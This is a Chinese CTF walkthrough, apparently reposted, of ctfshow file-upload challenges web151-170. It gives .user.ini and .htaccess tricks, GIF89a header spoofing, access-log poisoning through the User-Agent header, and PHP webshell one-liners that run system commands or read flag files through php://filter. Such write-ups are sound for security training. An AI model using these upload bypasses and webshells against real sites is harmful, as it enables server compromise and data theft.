当前位置: 首页 > news >正文

文件上传漏洞(ctfshow web151-161)

news 2025/8/25 17:34:45

Web151

F12修改源代码 exts后面png改为php 这样就可以上传php的文件了

Web152:

考点:后端不能单一校验

就是要传图片格式,抓个包传个png的图片 然后bp抓包修改php后缀解析 然后放包 

Web153-web156

在php代码中可以使用“{}”代替“[]”

.user.ini文件特性

当网站进行扫描时,会将.user.ini文件指向路径的内容包含在首页文件处(如index.php、index.html等),使用参数auto_prepend_file(包含至首页文件头部)和auto_append_file(包含在首页文件尾部)进行配置

例如:auto_prepend_file=1.png //将1.png文件内容包含在首页文件中,“=”后紧跟需要包含文件路径

所以,本题的解题思路:

先将.user.ini文件上传至upload目录处,并且在其中写入auto_prepend_file=1.png,紧接着上传1.png格式一句话代码,最后访问payload即可

auto_prepend_file=1.png

上传图片马

访问index.php

ws=system("tac ../flag.php");

Web157-158

其余操作同上

图片上传内容

<?=system('tac ../fl*')?>

Web159

其余操作同上

反引号绕过

<?=`tac ../fl*`?>

Web160

auto_prepend_file=1.png

上传图片马

<?=include"ph"."p://filter/convert.base64-encode/resource=../flag.p"."hp"?>

再解码

Web161

文件头校验添加

.gif,”GIF 89A”

GIF89a

auto_prepend_file=1.png

上传图片马

GIF89a

<?=include"ph"."p://filter/convert.base64-encode/resource=../flag.p"."hp"?>

再解码

Web162-165

未完成

Web166

Bp抓包查看返回数据包msg

访问GET /upload/2.zip

抓包发现

if(res.code==0){

     $("#result").html("文件上传成功 <a href='upload/download.php?file="+res.msg+"' target='_blank'>下载文件</a>");

浏览器访问地址下载zi'p

Web167

上传.htaccess文件

<FilesMatch ".jpg">

  SetHandler application/x-httpd-php

</FilesMatch>

上传一句话木马

x=system('tac ../flag.php');

Web168

上传1.php    内容为:

<?php echo `cat /var/www/html/*`;?>

https://4d308ebe-1e2a-4163-a95a-14c57cb8cf7e.challenge.ctf.show/upload/1.php

Web169

Content-Disposition: form-data; name="file"; filename=".user.ini"

Content-Type: image/png

auto_prepend_file=/var/log/nginx/access.log

上传.user.ini修改

上传一个php文件随便都行

抓包ua头rce

<?=system('cat ../flagaa.php')?>

 Web170

Content-Disposition: form-data; name="file"; filename=".user.ini"

Content-Type: image/png

auto_prepend_file=/var/log/nginx/access.log

上传.user.ini修改

上传一个php文件随便都行

抓包ua头rce

<?=system('cat ../flagaa.php')?>

http://www.lryc.cn/news/406833.html

相关文章:

  • 小猪佩奇.js
  • 人工智能AI合集:Ollama部署对话语言大模型-网页访问
  • CentOS搭建Apache服务器
  • CDGA|数据治理:安全如何贯穿数据供给、流通、使用全过程
  • 32单片机bootloader程序
  • MongoDB - 数组更新操作符:$、$[]、$pop、$pull、$push、$each、$sort、$slice、$position
  • 多GPU并行处理[任务分配、进程调度、资源管理、负载均衡]
  • 项目部署到服务器
  • Idea2024 创建Meaven项目没有src文件夹
  • LeetCode 2766.重新放置石块:哈希表
  • 基于STM32的农业大棚温湿度采集控制系统的设计
  • go语言的命名规则
  • 新增ClamAV病毒扫描功能、支持Java和Go运行环境,1Panel开源面板v1.10.12版本发布
  • Windows通过命令查看mac : getmac
  • Android笔试面试题AI答之Android系统与综合类(1)
  • 【Android】数据存储方案——文件存储、SharedPreferences、SQLite数据库用法总结
  • 抖音矩阵管理系统功能说明:一站式掌握
  • 旅游卡使用指南及常见疑问解答
  • 【MySQL篇】Percona XtraBackup标准化全库完整备份策略(第三篇,总共五篇)
  • 背单词工具(C++)
  • 面试八股 | 数据库引擎 | InnoDB和myISAM的区别?
  • GEE计算五种植被指数(NDVI、EVI2、RVI、MTVI2、OSAVI)
  • C/S架构和B/C架构
  • 音乐曲谱软件Guitar Pro 8.2 for Mac 中文破解版
  • 浅聊Web Storage(localStorage 和 sessionStorage)、cookie的使用场合
  • C语言输入输出缓冲机制
  • javaEE-03-cookie与session
  • EtherNet/IP转Profinet协议网关(经典配置案例)
  • 华为云依赖引入错误
  • 【Ubuntu】Ubuntu 配置镜像源(ARM)